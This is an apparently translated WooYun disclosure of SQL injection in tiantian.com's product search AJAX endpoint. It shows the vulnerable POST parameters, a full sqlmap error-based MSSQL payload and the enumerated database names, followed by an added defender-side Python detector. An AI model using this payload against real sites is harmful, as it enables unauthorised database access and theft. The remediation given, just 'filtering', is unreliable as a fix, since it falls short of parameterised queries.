Vulnerability summary

Bug ID: wooyun-2014-060774

Title: POST injection on the main site of Tiantian Tuangou (天天团购)

Vendor: tiantian.com

Reported by: 疯子

Submitted: 2014-05-15 10:55

Fixed: 2014-06-29 10:56

Disclosed: 2014-06-29 10:56

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by the vendor

Source: http://www.wooyun.org


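Vulnerability details

Disclosure status:

2014-05-15: Details sent to the vendor; awaiting vendor handling
2014-05-15: Vendor confirmed; details disclosed to the vendor only
2014-05-25: Details disclosed to core white hats and experts in related fields
2014-06-04: Details disclosed to regular white hats
2014-06-14: Details disclosed to intern white hats
2014-06-29: Details disclosed to the public

Brief description:

POST injection on the main site of Tiantian Tuangou

Detailed description:

Testing turned up a very well-hidden injection point on the main site. I heard Tiantian hands out gifts, so here I am, you know how it is!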
http://www.tiantian.com/products/search/index?Ajax_CallBack=true
post:Ajax_CallBackType=BizControls.common.ProductControl&Ajax_CallBackMethod=GetActionJson&Ajax_CallBackArgument0=j002355&Ajax_CallBackArgument1=1&Ajax_CallBackArgument2=1397

Proof of vulnerability:

sqlmap identified the following injection points with a total of 412 HTTP(s) requests:
---
Place: POST
Parameter: Ajax_CallBackArgument0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Ajax_CallBackType=BizControls.common.ProductControl&Ajax_CallBackMethod=GetActionJson&Ajax_CallBackArgument0=j002355') AND 6600=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (6600=6600) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(99)+CHAR(117)+CHAR(113))) AND ('KRzD'='KRzD&Ajax_CallBackArgument1=1&Ajax_CallBackArgument2=1397
---
web server operating system: Windows Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
available databases [17]:
[*] CPS_Log
[*] CPS_Union
[*] DBAdmin
[*] master
[*] model
[*] msdb
[*] newsite
[*] NewSite_Action
[*] NewSite_Archive
[*] NewSite_Biz
[*] NewSite_His
[*] NewSite_Wireless
[*] SiteBase
[*] tempdb
[*] tuan_sub
[*] WMSys_SKU_sub
[*] WMSys_sub
Database: NewSite_Action
[78 tables]
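
A defender-side sketch of how the request shown in the proof above can be recognised in logged POST bodies (an added example, not part of the original report; the function names and the two-of-three heuristic are assumptions, and the sample bodies are constructed from the request and payload quoted above). It also decodes the CHAR() runs, which are the delimiter strings placed around the value that surfaces in the integer-conversion error.

```python
import re
from urllib.parse import parse_qsl, urlencode

# Value of Ajax_CallBackArgument0 as quoted in the sqlmap output above.
REPORTED = ("j002355') AND 6600=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(104)"
            "+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (6600=6600) THEN CHAR(49) "
            "ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(99)+CHAR(117)+CHAR(113))) "
            "AND ('KRzD'='KRzD")

# Three or more CHAR(n) calls joined by '+': a string built to avoid quote characters.
CHAR_RUN = re.compile(r"(?:CHAR\(\d+\)\s*\+\s*){2,}CHAR\(\d+\)", re.I)
# A string forced through CONVERT(INT, ...): the cast fails and the error text leaks it.
FORCED_CAST = re.compile(r"\bCONVERT\s*\(\s*INT\s*,", re.I)

def decode_char_runs(value):
    """Return the literal string that each CHAR(n)+CHAR(n)+... run builds."""
    return ["".join(chr(int(n)) for n in re.findall(r"\((\d+)\)", run.group()))
            for run in CHAR_RUN.finditer(value)]

def inspect_body(body):
    """Return one finding per form field that shows at least two indicators."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        reasons = []
        if "'" in value:
            reasons.append("quote in value")
        if FORCED_CAST.search(value):
            reasons.append("forced integer cast")
        markers = decode_char_runs(value)
        if markers:
            reasons.append("CHAR() concatenation")
        if len(reasons) >= 2:  # assumption: two indicators are enough to alert
            findings.append({"param": name, "reasons": reasons, "markers": markers})
    return findings

def sample_bodies():
    """Constructed wire-format bodies: the normal request and the injected one."""
    base = {"Ajax_CallBackType": "BizControls.common.ProductControl",
            "Ajax_CallBackMethod": "GetActionJson",
            "Ajax_CallBackArgument0": "j002355",
            "Ajax_CallBackArgument1": "1", "Ajax_CallBackArgument2": "1397"}
    return urlencode(base), urlencode({**base, "Ajax_CallBackArgument0": REPORTED})

if __name__ == "__main__":
    benign, injected = sample_bodies()
    print(inspect_body(benign))
    print(inspect_body(injected))
```

Matching these patterns only flags the probe in logs; the query behind `Ajax_CallBackArgument0` still has to bind the value as a parameter rather than concatenate it.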

Remediation:

Filtering

Copyright notice: when reposting, please credit the source 疯子@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2014-05-15 12:49

Vendor reply:

Contact details

Latest status:

None yet

